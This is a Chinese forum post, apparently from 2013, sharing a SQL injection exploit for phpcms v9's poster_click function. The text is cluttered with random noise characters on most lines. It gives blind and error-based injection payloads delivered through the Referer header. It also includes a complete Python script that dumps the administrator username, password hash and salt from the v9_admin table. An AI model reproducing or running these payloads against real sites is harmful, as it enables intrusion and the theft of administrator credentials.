有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:( \: H% R4 q; Z$ c' H4 j# n7 `
$ _4 D3 h+ y5 _; Q2 H问题函数\phpcms\modules\poster\index.php
# G( G' x2 Q9 \" H: J1 A
8 Z( j4 k& f- xpublic function poster_click() {
. H: c4 p% t" ~3 B$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
5 v, S( }& m& v5 M6 {( u5 ^$r = $this->db->get_one(array('id'=>$id));
# j# o& G5 }. L# cif (!is_array($r) && empty($r)) return false;4 O% u% e& z6 T/ [
$ip_area = pc_base::load_sys_class('ip_area');3 B c* z+ X! V, g% {7 _$ W; d
$ip = ip();! I$ a# Y) A6 K1 C' n% {* u# ~8 c
$area = $ip_area->get($ip);0 K8 V, Y" Z: V: S# Q
$username = param::get_cookie('username') ? param::get_cookie('username') : '';
5 _/ _) F7 t) P- m; l/ w- yif($id) {
5 b2 G Y: y9 }4 n$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();/ Q; e, K0 f9 ^2 a' K
$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));; _9 f3 i3 t3 l" A7 z
}
+ @2 k+ x! V7 \0 G' K# K$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
0 n( s5 f' u8 t4 l$ X6 I$setting = string2array($r['setting']);
5 F& e" _$ A4 Kif (count($setting)==1) {
+ A5 }2 O) t C" q+ G$url = $setting['1']['linkurl'];
6 L+ v# d# F4 X& f$ H* y} else {/ T1 G2 J( k q5 k
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
i% O; K4 ~. v% Z$ l7 T1 p}
, ]6 ^: g8 t2 Rheader('Location: '.$url);
. m8 u9 |9 x. s6 y2 E/ ]& L}3 n6 U7 W" ?1 O2 S# {( o
. f" G; j8 A9 f7 r$ H# @* } % [1 C5 E1 ]3 T7 f2 T
0 O/ ~5 }1 ~) W, x: j利用方式:# _* J2 M$ K- r+ y- l
1 O: P6 A) d& Q. L1、可以采用盲注入的手法:" \: u4 }: r$ {
0 q; G: _ f7 a$ l* H* ~2 V% g
referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#
' `6 o3 D" z, U6 e; u+ i: D. Y' @& E+ x- E! q: J+ Z i4 w' ?
通过返回页面,正常与否一个个猜解密码字段。
" _ E( ?: t9 i b+ J
% l/ X3 t! @5 R! l& }1 x+ N2、代码是花开写的,随手附上了:
& P4 Y8 W# O) F" z& }7 N L2 G( ?" ~) M3 r2 n5 N4 d7 v
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
$ o5 S: l U5 v7 o1 Z
' X+ V* k! ]3 \此方法是爆错注入手法,原理自查。
/ \0 ]% B6 Y1 d! z( ~: c5 ~( f+ H9 q5 b: g
1 e: A* W& ?) h! w* V, h
" n4 _! A) I% b. K* n利用程序:
1 A% T0 U3 u" S9 B4 G& p
/ R7 \$ y% m, S; v/ M#!/usr/bin/env python7 c9 g8 j. \* R6 r3 d: T* X2 a
import httplib,sys,re6 o! M: ]8 K8 z. T, D
/ w# J; ], L8 e1 y; }: Adef attack():
) |2 i% E5 K& C* C1 qprint “Code by Pax.Mac Team conqu3r!”( Q% Z5 r$ [' |! a$ T6 B4 z( _
print “Welcome to our zone!!!”
3 J* `$ v& ~, l0 i4 F2 Murl=sys.argv[1]
7 f# m- m, m8 i! F0 c' Q4 cpaths=sys.argv[2]8 b! J% m3 C) G# g: K
conn = httplib.HTTPConnection(url)/ o6 d6 }+ h% Z0 V: F" p
i_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
" U/ b. T/ q4 o; U9 O5 q# q! G“Accept”: “text/plain”,/ V. p% e! Z A
“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
' K8 u9 p k: Y# @ mconn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)& r4 V& H, ^, f7 Y% L
r1 = conn.getresponse()
2 N J& @! E, d( m% Y+ ~datas=r1.read()
9 Z; |3 X1 ^3 P- j3 Rdatas=re.findall(r”Duplicate entry \’\w+’”, datas)$ v, a: s; W4 v, ^, y
print datas[0]; s' R3 Z1 ?; v' h
conn.close()
8 Y, G5 ?" R5 ~- {. O, N V; lif __name__==”__main__”:
4 a+ g6 x# m% A2 zif len(sys.argv)<3:. O* x6 R+ v( @- w1 I3 b( x; {
print “Code by Pax.Mac Team conqu3r”
y7 v% P- O* ^7 Gprint “Usgae:”6 }5 i& o: U3 x" P: ]
print “ phpcmsattack.py www.paxmac.org /”3 N% ~% K+ b0 G) f
print “ phpcmsataack.py www.paxmac.org /phpcmsv9/”0 H6 Z# A; y9 S5 X5 C
sys.exit(1)
# c# O/ \' _" h+ n5 mattack()
& ]& Z' T. o0 x+ S7 P' ^. M5 d" L9 r. t, U+ b. Y: p
|
发表于 2013-1-11 21:01:00
收藏
支持
反对